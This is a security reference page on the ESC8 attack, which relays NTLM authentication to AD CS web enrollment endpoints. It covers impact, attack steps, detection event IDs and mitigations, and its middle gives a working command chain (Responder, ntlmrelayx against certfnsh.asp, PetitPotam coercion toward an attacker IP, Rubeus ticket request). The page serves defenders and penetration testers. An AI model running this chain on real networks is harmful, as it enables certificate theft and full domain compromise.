ESC8: NTLM Relay to ADCS HTTP Endpoints
ESC8 exploits the ability to relay NTLM authentication to ADCS HTTP endpoints, potentially allowing an attacker to obtain certificates for other users, including domain administrators.
ESC8 takes advantage of the NTLM authentication protocol's vulnerability to relay attacks. An attacker can intercept NTLM authentication attempts and relay them to ADCS HTTP endpoints, potentially obtaining certificates for other users, including highly privileged accounts like domain administrators.
Learn more about AD CS defense strategies to protect against this and other attacks.
- Unauthorized certificate issuance for privileged accounts
- Potential for complete domain compromise
- Bypass of multi-factor authentication
- Silent persistence in the network
- Set up a machine to intercept NTLM authentication attempts
- Relay the intercepted authentication to ADCS HTTP endpoints
- Request and obtain certificates for the relayed user
- Use the obtained certificates for further privilege escalation or persistence
When conducting AD CS penetration testing, consider the following aspects specific to ESC8: NTLM Relay to ADCS HTTP Endpoints:
- Identify vulnerable certificate templates and misconfigurations
- Assess the potential impact on the overall AD CS security
- Evaluate the effectiveness of existing security controls
- Test for the ability to exploit this vulnerability in the target environment
- Document findings and provide actionable remediation steps
Set up Responder to capture NTLM hashes
.\Responder.exe -I eth0 -w -r -d -PUse ntlmrelayx to relay authentication to ADCS
ntlmrelayx.py -t http://ca.domain.com/certsrv/certfnsh.asp -smb2support --adcs --template DomainControllerTrigger NTLM authentication (e.g., using PetitPotam)
.\PetitPotam.exe -d domain.com -u user -p password <attacker_ip> <target_dc>Use obtained certificate for authentication
Rubeus.exe asktgt /user:DC$ /certificate:<path_to_cert.pfx> /ptt- Monitor for unusual certificate issuance patterns
- Implement network traffic analysis to detect potential NTLM relay attempts
- Use Windows Event Log monitoring to identify suspicious certificate requests
- Deploy honeypot accounts to detect potential relay attacks
- Implement and monitor ADCS security auditing
- 4768: A Kerberos authentication ticket (TGT) was requested
- 4769: A Kerberos service ticket was requested
- 4886: Certificate Services approved a certificate request
- 4887: Certificate Services denied a certificate request
To mitigate ESC8: NTLM Relay to ADCS HTTP Endpoints and enhance overall AD CS security, consider implementing the following measures:
- Disable NTLM authentication for ADCS web enrollment
- Implement Extended Protection for Authentication (EPA)
- Use HTTPS for all ADCS endpoints
- Enable SMB signing and enforce it domain-wide
- Implement network segmentation to isolate ADCS servers
- Regularly conduct AD CS penetration testing to identify and address vulnerabilities
- Implement the principle of least privilege across your AD CS infrastructure
- Maintain up-to-date documentation of your AD CS configuration and security policies
Related AD CS Attacks
Explore other attack vectors that target Active Directory Certificate Services:
